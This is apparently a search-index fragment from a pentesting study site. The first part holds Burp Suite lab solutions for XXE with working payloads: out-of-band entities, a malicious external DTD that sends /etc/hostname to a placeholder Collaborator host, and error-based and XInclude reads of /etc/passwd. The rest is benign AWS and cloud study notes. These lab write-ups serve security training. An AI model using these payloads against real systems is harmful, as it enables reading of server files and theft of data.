                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#blind-xxe-with-out-of-band-interaction","title":"Blind XXE with out-of-band interaction","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_2","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input but does not display the result.

                            You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.

                            To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_2","title":"Solution","text":"
                            # Burpsuite solution\n1. Visit a product page, click \"Check stock\" and intercept the resulting POST request in [Burp Suite Professional](https://portswigger.net/burp/pro).\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element. Right-click and select \"Insert Collaborator payload\" to insert a Burp Collaborator subdomain where indicated:\n\n    `<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM \"http://BURP-COLLABORATOR-SUBDOMAIN\"> ]>`\n3. Replace the `productId` number with a reference to the external entity:\n\n    `&xxe;`\n4. Go to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#blind-xxe-with-out-of-band-interaction-via-xml-parameter-entities","title":"Blind XXE with out-of-band interaction via XML parameter entities","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_3","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.

                            To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#note","title":"Note","text":"

                            To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_3","title":"Solution","text":"
                            1. Visit a product page, click \"Check stock\" and intercept the resulting POST request in [Burp Suite Professional](https://portswigger.net/burp/pro).\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element. Right-click and select \"Insert Collaborator payload\" to insert a Burp Collaborator subdomain where indicated:\n\n    `<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM \"http://BURP-COLLABORATOR-SUBDOMAIN\"> %xxe; ]>`\n3. Go to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-blind-xxe-to-exfiltrate-data-using-a-malicious-external-dtd","title":"Exploiting blind XXE to exfiltrate data using a malicious external DTD","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_4","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input but does not display the result.

                            To solve the lab, exfiltrate the contents of the /etc/hostname file.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_4","title":"Solution","text":"
                            # Burpsuite solution\n1. Using [Burp Suite Professional](https://portswigger.net/burp/pro), go to the [Collaborator](https://portswigger.net/burp/documentation/desktop/tools/collaborator) tab.\n2. Click \"Copy to clipboard\" to copy a unique Burp Collaborator payload to your clipboard.\n3. Place the Burp Collaborator payload into a malicious DTD file:\n\n    `<!ENTITY % file SYSTEM \"file:///etc/hostname\"> <!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>\"> %eval; %exfil;`\n4. Click \"Go to exploit server\" and save the malicious DTD file on your server. Click \"View exploit\" and take a note of the URL.\n5. You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n6. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"YOUR-DTD-URL\"> %xxe;]>`\n7. Go back to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again.\n8. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The HTTP interaction could contain the contents of the `/etc/hostname` file.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-blind-xxe-to-retrieve-data-via-error-messages","title":"Exploiting blind XXE to retrieve data via error messages","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_5","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input but does not display the result.

                            To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file.

                            The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_5","title":"Solution","text":"
                            # Burpsuite solution\n\n1. Click \"Go to exploit server\" and save the following malicious DTD file on your server:\n\n    `<!ENTITY % file SYSTEM \"file:///etc/passwd\"> <!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>\"> %eval; %exfil;`\n\n    When imported, this page will read the contents of `/etc/passwd` into the `file` entity, and then try to use that entity in a file path.\n\n2. Click \"View exploit\" and take a note of the URL for your malicious DTD.\n3. You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n4. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"YOUR-DTD-URL\"> %xxe;]>`\n\n    You should see an error message containing the contents of the `/etc/passwd` file.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xinclude-to-retrieve-files","title":"Exploiting XInclude to retrieve files","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_6","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that embeds the user input inside a server-side XML document that is subsequently parsed.

                            Because you don't control the entire XML document you can't define a DTD to launch a classic XXE attack.

                            To solve the lab, inject an XInclude statement to retrieve the contents of the /etc/passwd file.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_6","title":"Solution","text":"
                            # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Set the value of the `productId` parameter to:\n\n    `<foo xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include parse=\"text\" href=\"file:///etc/passwd\"/></foo>`\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-via-image-file-upload","title":"Exploiting XXE via image file upload","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_7","title":"Enunciation","text":"

                            This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

                            To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the \"Submit solution\" button to submit the value of the server hostname.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_7","title":"Solution","text":"

                            Afterwards, retrieve the avatar image:

                            # Burpsuite solution\n\n- Create a local SVG image with the following content:\n\n    `<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>`\n- Post a comment on a blog post, and upload this image as an avatar.\n- When you view your comment, you should see the contents of the `/etc/hostname` file in your image. Use the \"Submit solution\" button to submit the value of the server hostname.\n

                            Payload:

                            <?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-to-retrieve-data-by-repurposing-a-local-dtd","title":"Exploiting XXE to retrieve data by repurposing a local DTD","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_8","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input but does not display the result.

                            To solve the lab, trigger an error message containing the contents of the /etc/passwd file.

                            You'll need to reference an existing DTD file on the server and redefine an entity from it.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#hint","title":"Hint","text":"

                            Systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_8","title":"Solution","text":"
                            # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following parameter entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM \"file:///usr/share/yelp/dtd/docbookx.dtd\"> <!ENTITY % ISOamso ' <!ENTITY &#x25; file SYSTEM \"file:///etc/passwd\"> <!ENTITY &#x25; eval \"<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>\"> &#x25;eval; &#x25;error; '> %local_dtd; ]>` This will import the Yelp DTD, then redefine the `ISOamso` entity, triggering an error message containing the contents of the `/etc/passwd` file.\n
                            ","tags":["burpsuite","jwt"]},{"location":"cloud/","title":"Pentesting cloud","text":"","tags":["cloud pentesting"]},{"location":"cloud/#basics-about-cloud","title":"Basics about cloud","text":"

                            There are many \"clouds\". But these three cloud providers are the big three players in the market:

                            • Azure: Fundamentals | Security Engineer Level.
                            • Amazon Web Services (AWS): AWS essentials
                            • Google Cloud: GCP essentials
                            ","tags":["cloud pentesting"]},{"location":"cloud/#cloud-services-matrix","title":"Cloud services matrix","text":"Azure AWS GCP Available Regions Azure Regions AWS Regions and Zones Google Compute Regions & Zones Compute Services Virtual Machines Elastic Compute Cloud (EC2) Compute Engine App Hosting Azure App Service Amazon Elastic Beanstalk Google App Engine Serverless Computing Azure Functions AWS Lambda Google Cloud Functions Container Support Azure Container Service EC2 Container Service Google Computer Engine (GCE) Scaling Options Azure Autoscale Auto Scaling Autoscaler Object Storage Azure Blob Storage Amazon Simple Storage (S3) Google Cloud Storage Block Storage Azure Disks Amazon Elastic Block Store Persistent Disk Content Delivery Network (CDN) Azure CDN Amazon CloudFront Cloud CDN SQL Database Options Azure SQL Database Amazon RDS Google Cloud SQL NoSQL Database Options Azure CosmosDB AWS DynamoDB Google Cloud Bigtable Virtual Network Azure Virtual Network Amazon VPC Cloud Virtual Network Private Connectivity Azure ExpressRoute AWS Direct Connect Cloud Interconnect DNS Services Azure DNS Amazon Route S3 Cloud DNS Log Monitoring Azure Log Analytics Amazon CloudTrail Cloud Logging Performance Monitoring Azure Application Insights Amazon CloudWatch Stackdriver Monitoring Administration and Security Azure Entra ID AWS Identity and Access Management Cloud Identity and Access Management Compliance Azure Trust Center AWS CloudHSM Google Cloud Platform Security Analytics Azure Monitor Amazon Kinesis Cloud Dataflow Automation Azure Automation AWS Opsworks Compute Engine Management Management Services & Options Azure Resource Manager Amazon Cloudformation Cloud Deployment Manager Notifications Azure Notification Hub Amazon Simple Notification Service (SNS) None Load Balancing Load Balancing for Azure Elastic Load Balancing Load Balancer","tags":["cloud pentesting"]},{"location":"cloud/#pentesting-cloud_1","title":"Pentesting cloud","text":"
                            • Pentesting Azure.
                            • Pentesting AWS.
                            • Pentesting docker.
                            ","tags":["cloud pentesting"]},{"location":"cloud/apache-cloudstack/apache-cloudstack-essentials/","title":"Apache CloudStack Essentials","text":"

                            Apache CloudStack is open source software designed to deploy and manage large networks of virtual machines, as a highly available, highly scalable Infrastructure as a Service (IaaS) cloud computing platform.

                            Cloudstack is a turnkey solution that includes the entire stack of features most organizations want in an IaaS cloud.

                            That means compute orchestration, Network-as-a-Service, user and account management, a full and open native API, resource accounting, and a first-class user interface (UI). CloudStack currently supports the most popular hypervisors: VMware, KVM, Citrix XenServer, Xen Cloud Platform, Oracle VM Server and Microsoft Hyper-V.

                            Users can manage their cloud with an easy-to-use web interface, command-line tools, and/or a full-featured RESTful API.

                            In addition, CloudStack provides an API that is compatible with Amazon Web Services EC2 and S3.

                            • Useful for organizations that wish to deploy hybrid clouds.
                            • The CloudStack dashboard is similar to the OpenStack dashboard.
                            • You can manage all your resources from it.

                            Link to installation: https://docs.cloudstack.apache.org/en/4.18.0.0/installguide/overview/index.html

                            ","tags":["cloud","apache cloudstack","open source"]},{"location":"cloud/aws/aws-essentials/","title":"Amazon Web Services (AWS) Essentials","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-compute","title":"AWS Compute","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-computer-cloud-ec2","title":"Elastic Computer Cloud (EC2)","text":"

                            An EC2 instance is a Virtual Server running on AWS. You deploy your EC2 instances into a virtual private cloud or VPC. You can deploy them into public or private subnets.

                            You can choose: OS, CPU, RAM, storage space, network card, firewall rules (security group), and a bootstrap script (configured at first launch, called EC2 User Data). Bootstrapping means launching commands when a machine starts; that script runs only once, at first start. You can use it to install updates, software, common files from the internet,...

                            Public subnets have a public IP address and can be accessed from the Internet. Private subnets are isolated; they can only communicate with each other within the VPC (unless you install a gateway).

                            Some instance types: t2.micro, t2.xlarge, c5d.4xlarge, r5.16xlarge, m5.8xlarge,... t2.micro is part of the AWS free tier with up to 750 hours per month. This is the naming convention for instances:

                            m5.2xlarge\n# m: instance class\n# 5: generation of the instance \n# 2xlarge: size within the instance class\n

                            There are general purpose instances, storage optimized, network optimized, or memory optimized, for instance.

                            Security groups only have allow rules (because the default is deny). By default, all inbound traffic is blocked and all outbound traffic is authorized. An instance can have multiple security groups, and security group rules can reference other security groups.
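
                            As an illustrative sketch (the group ID is a placeholder), adding an allow rule for inbound SSH with the AWS CLI looks like this:

                            # allow inbound TCP/22 from anywhere on an existing security group\naws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 --protocol tcp --port 22 --cidr 0.0.0.0/0\n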

                            Default user for connecting to EC2 via ssh is ec2-user. So ssh connection would be:

                            ssh -i access-key.pem ec2-user@<IP>\n
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ami","title":"AMI","text":"

                            AMI stands for Amazon Machine Image and they represent a customization of an EC2 instance. It's similar to the concept of OVA in VirtualBox.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ec2-image-builder","title":"EC2 Image Builder","text":"

                            EC2 Image Builder is used to automate the creation of VM or container images. It automates the creation, maintenance, validation, and testing of EC2 AMIs. It can run on a schedule. It's a free service.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-storage","title":"AWS Storage","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-block-store-ebs","title":"Amazon Elastic Block Store (EBS)","text":"

                            A block storage device is a virtual hard drive in the cloud. The OS reads/writes at the block level. Disks can be internal or network-attached. The OS sees volumes that can be partitioned and formatted. Use cases:

                            • Use by Amazon EC2 instances.
                            • Relational and non-relational databases.
                            • Enterprise applications.
                            • Containerized applications.
                            • Big data analytics.
                            • File systems.

                            The free tier has 30GB of free EBS storage of type General Purpose (SSD) or Magnetic per month.

                            A definition for EBS would be that they are network drives (not physical drives). They use the network to communicate with the instance. They can be detached from an EC2 instance and attached to another very quickly. They are locked to an Availability Zone.

                            They don't need to be attached to an instance. They also have a delete-on-termination attribute: by default, the root volume is deleted when the instance terminates, while additionally attached volumes are not. This attribute can be changed from the AWS CLI.
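
                            For example, a sketch of disabling the delete-on-termination flag for the root device (the instance ID and device name are placeholders):

                            aws ec2 modify-instance-attribute --instance-id i-0123456789abcdef0 --block-device-mappings '[{\"DeviceName\":\"/dev/sda1\",\"Ebs\":{\"DeleteOnTermination\":false}}]'\n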

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ebs-snapshots","title":"EBS Snapshots","text":"

                            It makes a backup (snapshot) of your EBS volume at a point in time. It's not necessary to detach the volume to take a snapshot, but it is recommended. Snapshots are useful to replicate EBS volumes across regions: by copying a snapshot to a different region, you can migrate an EBS volume to that region.

                            There is an EBS Snapshot Archive service that allows you to move a snapshot to an archive tier that is 75% cheaper.

                            There is also a Recycle Bin that allows you to retain deleted snapshots; you can define its retention policy.
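
                            A minimal sketch of both operations with the AWS CLI (the IDs and regions are placeholders):

                            # take a snapshot of a volume\naws ec2 create-snapshot --volume-id vol-0123456789abcdef0 --description \"backup before migration\"\n\n# copy it to another region (run against the destination region)\naws ec2 copy-snapshot --region eu-west-1 --source-region us-east-1 --source-snapshot-id snap-0123456789abcdef0\n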

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ec2-instance-store","title":"EC2 Instance Store","text":"

                            EBS volumes are network drives with good but limited performance. If you need a high-performance hardware disk, you have EC2 Instance Store.

                            EC2 Instance Store is good for buffer / cache / scratch data and temporary content, but not for long-term storage.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-file-system-efs","title":"Amazon Elastic File System (EFS)","text":"

                            It uses File Storage, in which a filesystem is mounted to the OS using a network share. A filesystem can be shared by many users. Use cases:

                            • Corporate home directories.
                            • Corporate shared directories.
                            • Big data analytics.
                            • Lift & Shift enterprise applications.
                            • Web serving.
                            • Content management.

                            EFS works only with Linux EC2 instances in multi-AZ.
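
                            As an illustrative sketch, mounting an EFS filesystem from a Linux EC2 instance over NFS looks like this (the filesystem ID and region are placeholders; the amazon-efs-utils mount helper is an alternative):

                            sudo mkdir -p /mnt/efs\nsudo mount -t nfs4 -o nfsvers=4.1 fs-0123456789abcdef0.efs.us-east-1.amazonaws.com:/ /mnt/efs\n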

                            EFS Infrequent Access (EFS-IA) is a storage class cost-optimized for files that you don't access very often. It saves up to 92% in cost compared to EFS Standard. EFS-IA is enabled through a Lifecycle policy.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-fsx","title":"Amazon FSx","text":"

                            Amazon FSx is a managed service to get third-party high-performance file systems on AWS.

                            It's fully managed. There are 3 services:

                            • FSx for Lustre: High Performance Computing. For machine learning, analytics, video processing, financial modelling...
                            • FSx for Windows File Server: supports SMB and NTFS. Built on Windows File Server. Integrated with Windows Active Directory.
                            • FSx for NetApp ONTAP
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-simple-storage-services-s3","title":"Amazon Simple Storage Services (S3)","text":"

                            It uses object storage containers (buckets). There is no hierarchy of objects in the container. It's used for backup and storage, along with disaster recovery, archive, media hosting, hybrid cloud storage... It uses a REST API. Use cases:

                            • Websites.
                            • Mobile applications.
                            • Backup and archiving.
                            • IoT devices.
                            • Big data analytics.

                            As benefits, it has very low-cost object storage, a high durability and multiple storage classes.

                            In S3 you have buckets. A bucket is a container into which you put your objects. You can make the objects inside your bucket public or private to the Internet. Buckets must have a globally unique name. They are defined at the region level.

                            A key is the full path to the file: s3://my-bucket/my-folder/my-file.txt It's composed of a prefix and an object name. Max object size is 5TB (5000 GB).

                            There are S3 Bucket Policies to allow public access. There are also IAM permissions that you can assign to users, and EC2 Instance Roles to grant access to EC2 instances. Additionally, in the bucket settings you can block public access (this can also be set at the account level).
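
                            For instance, a minimal sketch of attaching a policy that makes all objects in a bucket publicly readable (the bucket name is a placeholder):

                            aws s3api put-bucket-policy --bucket my-bucket --policy '{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"PublicRead\",\"Effect\":\"Allow\",\"Principal\":\"*\",\"Action\":[\"s3:GetObject\"],\"Resource\":[\"arn:aws:s3:::my-bucket/*\"]}]}'\n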

                            Cool tool: Amazon policy generator

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#creating-a-static-website","title":"Creating a static website","text":"

                            This would be the url: http://bucketname.s3-website-aws-region.amazonaws.com
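
                            A sketch of enabling static website hosting on a bucket with the AWS CLI (the bucket name is a placeholder; the objects must also be publicly readable):

                            aws s3 website s3://my-bucket --index-document index.html --error-document error.html\n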

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#storage-classes","title":"Storage classes","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-network","title":"Amazon Network","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-load-balancing-elb","title":"Amazon Elastic Load Balancing (ELB)","text":"

                            A load balancer is a server that forwards internet traffic down to multiple servers downstream; these are EC2 instances, also called the backend EC2 instances.

                            Elastic Load Balancing is managed by AWS.

                            Benefits:

                            • ELB can spread the load across multiple downstream instances.
                            • ELB allows you to expose a single point of access, a DNS host name, for your application.
                            • ELB can seamlessly handle the failures of downstream instances.
                            • ELB can do regular health checks on them, and if one of them is failing, the load balancer will not direct traffic to that instance.
                            • It provides SSL termination (HTTPS) for your websites.

                            There are 4 kinds:

                            • Application Load Balancer (HTTP/HTTPS only) - Layer 7
                            • Network Load Balancer (ultra high performance, allows for TCP) - Layer 4
                            • Gateway Load Balancer - Layer 3
                            • Classic Load Balancer (retired in 2023) - Layer 4 and 7

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#auto-scaling-groups-asg","title":"Auto Scaling Groups (ASG)","text":"

                            The goal of an Auto Scaling Group is to scale out (add EC2 instances to match an increased load) or scale in (remove EC2 instances to match a decreased load). With this we can also ensure a minimum and a maximum number of machines running at any point in time, and as the Auto Scaling Group creates or removes EC2 instances, those instances are registered or deregistered in our load balancer.

                            You can define a minimum size, a maximum size, and a desired capacity.
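
                            A sketch of creating an ASG with those three parameters via the AWS CLI (the group name, launch template, and subnets are placeholders):

                            aws autoscaling create-auto-scaling-group --auto-scaling-group-name my-asg --launch-template LaunchTemplateName=my-template --min-size 1 --max-size 5 --desired-capacity 2 --vpc-zone-identifier \"subnet-0123abcd,subnet-4567efgh\"\n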

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-migration-tools","title":"Amazon migration tools","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-snow","title":"AWS Snow","text":"
                            • Snowball Edge Storage Optimized & Snowball Edge Compute Optimized
                            • AWS Snowcone & Snowcone SSD
                            • AWS Snowmobile (the truck). 100 PB of capacity.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#edge-computing","title":"Edge Computing","text":"

                            Edge Computing is when you process data while it's being created at an edge location. You can use the Snow Family to run EC2 instances and Lambda functions to do this.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-opshub","title":"AWS OpsHub","text":"

                            OpsHub is software that you install on your computer or laptop, so it's not something you use in the cloud. Once it's connected, it gives you a graphical interface to connect to your Snow devices, configure them, and use them.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-databases","title":"AWS Databases","text":"

                            AWS offers managed databases. As benefits, AWS provides quick provisioning, high availability, vertical and horizontal scaling, automated backup and restore, operations, upgrades, patching, monitoring, alerting...

                            You can always launch an EC2 instance and install a database server on it, but by using an AWS managed database you won't need to configure and maintain all the features from the previous paragraph.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#relational-database-service-amazon-rds","title":"Relational Database Service (Amazon RDS)","text":"

                            It's a relational database which uses SQL as a query language.

                            • Postgres
                            • MySQL
                            • MariaDB
                            • Oracle
                            • Microsoft SQL Server
                            • Aurora (AWS Proprietary Database).

                            Note: You can NOT ssh into your instance.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#rds-deployments-read-replicas-multi-az","title":"RDS Deployments: Read Replicas, Multi-AZ","text":"

                            RDS Read Replica

                            • A Replica is a copy of your database. Creating one is a way to scale the read workload. Say you have an application that performs read operations on your database. If you need to scale the workload, you create Read Replicas, which are copies of your RDS database. This allows your applications to also read from the Replicas, therefore distributing the reads across many different RDS databases.
                            • You can create multiple Read Replicas.
                            • Data is only written to the one central RDS database.

                            Multi-AZ

                            • Used for failover in case of an AZ outage. If your RDS instance crashes, AWS fails over to a replica in a different Availability Zone.

                            Multi-Region

                            Same as Multi-AZ but for different regions. This is usually part of a disaster recovery strategy or a plan to reduce latency.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-aurora","title":"Amazon Aurora","text":"
                            • Aurora is a proprietary technology from AWS, not open source.
                            • Aurora DB supports Postgres and MySQL.
                            • Aurora is \"AWS Cloud optimized\" and claims 5x performance improvement over MySQL on RDS, and over 3x the performance of Postgres on RDS.
                            • Aurora storage automatically grows in increments of 10 GB, up to 128 TB.
                            • Aurora costs more than RDS (20% more) but it's more efficient.
                            • Not in the free tier.

                            RDS and Aurora are going to be the two ways for you to create relational databases on AWS. They're both managed and Aurora is going to be more cloud-native, whereas RDS is going to be running the technologies you know, directly as a managed service.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-aurora-serverless","title":"Amazon Aurora Serverless","text":"

                            Amazon Aurora Serverless is a Serverless option for Amazon Aurora where the database instantiation is going to be automated.

                            • Auto-scaling is provided based on actual usage of the database.
                            • Postgres and MySQL are supported as engines of Aurora Serverless database.
                            • No capacity planning needed.
                            • No management needed.
                            • Pay per second, most cost-effective.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elasticache","title":"Amazon ElastiCache","text":"
                            • ElastiCache provides managed Redis or Memcached.
                            • Caches are in-memory databases with high performance and low latency.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb","title":"DynamoDB","text":"
                            • Fully managed, highly available, with replication across 3 AZs.
                            • NoSQL database.
                            • Scales to massive workloads; distributed serverless database.
                            • Millions of requests per second: low latency.
                            • Integrated with IAM for security, authorization and administration.
                            • Low cost and auto-scaling capabilities.
                            • Standard and Infrequent Access Table Class.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb-accelerator-dax","title":"DynamoDB Accelerator (DAX)","text":"
                            • Fully managed in-memory cache for DynamoDB (for the frequently read objects).
                            • 10x performance improvement.
                            • DAX is only used for and is integrated with DynamoDB, while ElastiCache can be used for other databases.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb-global-tables","title":"DynamoDB Global Tables","text":"

                            It makes a DynamoDB table accessible with low latency in multiple regions. It's a feature of DynamoDB.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#redshift","title":"Redshift","text":"
                            • It's a database based on PostgreSQL, but it's not used for Online Transaction Processing (OLTP).
                            • Redshift is Online Analytical Processing (OLAP), used for analytics and data warehousing.
                            • Data is loaded once every hour.
                            • Columnar storage of data (instead of row based).
                            • Has a SQL interface for performing queries.
                            • Massively Parallel Query Execution (MPP).
                            • BI tools such as AWS QuickSight or Tableau integrate with it.

                            It has a feature for Serverless: Redshift Serverless.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-mapreduce-emr","title":"Amazon Elastic MapReduce (EMR)","text":"
                            • EMR helps create Hadoop clusters (Big Data) to analyze and process vast amounts of data.
                            • Also supports Apache Spark, HBase, Presto, Flink.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-athena","title":"Amazon Athena","text":"
                            • Amazon Athena is a serverless query service to perform analytics against S3 objects.
                            • It uses the SQL language.
                            • Supports CSV, JSON, ORC, Avro, and Parquet.
                            • Uses columnar data (see the sketch below).
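
                            A sketch of running a query from the AWS CLI (the database, table, and output bucket are placeholders):

                            aws athena start-query-execution --query-string \"SELECT * FROM my_table LIMIT 10\" --query-execution-context Database=my_db --result-configuration OutputLocation=s3://my-athena-results/\n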
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-quicksight","title":"Amazon QuickSight","text":"

                            Amazon QuickSight is a serverless machine learning-powered business intelligence service to create interactive dashboards.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#documentdb","title":"DocumentDB","text":"
                            • If Aurora is an AWS implementation of Postgres/MySQL, DocumentDB is the same for MongoDB (which is a NoSQL database).
                            • MongoDB is used to store, query and index JSON.
                            • Fully managed database, with replication across AZs.
                            • Automatic scaling.
